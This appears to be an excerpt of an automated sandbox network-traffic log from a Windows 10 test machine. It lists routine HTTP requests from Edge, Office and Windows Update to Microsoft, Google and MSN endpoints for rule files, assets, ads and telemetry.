Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pdYEopsCsEzHTxO&MD=Cpf3bV6g HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1731815718&P2=404&P3=2&P4=aB25p7ZLpIV6qR6AlPFwsBus7nVonDr4vvYYiUEgHo3VnwULrw6GYe3VNhhMi6aGxRmwl6DxZDywB%2fDQKJzzIg%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: oNH1SYvcyi0Cf2mK5oHhtJSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b?rn=1731210922530&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1C457A5C69C96D7328066F6F68476CEB&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1731210922530&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=1b1c38cab0134bc7a8e603f795c6d608&activityId=1b1c38cab0134bc7a8e603f795c6d608&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=1C457A5C69C96D7328066F6F68476CEB; _EDGE_S=F=1&SID=04348CE3E2B16FF0131799D0E3856EA1; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=1C457A5C69C96D7328066F6F68476CEB&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=b2252d14d5184741fac3aadb74e7d715 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=1C457A5C69C96D7328066F6F68476CEB; _EDGE_S=F=1&SID=04348CE3E2B16FF0131799D0E3856EA1; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msDML.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1731210922530&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1C457A5C69C96D7328066F6F68476CEB&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=12E432c46d4b1e2524559821731210924; XID=12E432c46d4b1e2524559821731210924
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=1C457A5C69C96D7328066F6F68476CEB&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=0902b7c21215417c866409a70277b594 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1C457A5C69C96D7328066F6F68476CEB; _EDGE_S=F=1&SID=04348CE3E2B16FF0131799D0E3856EA1; _EDGE_V=1
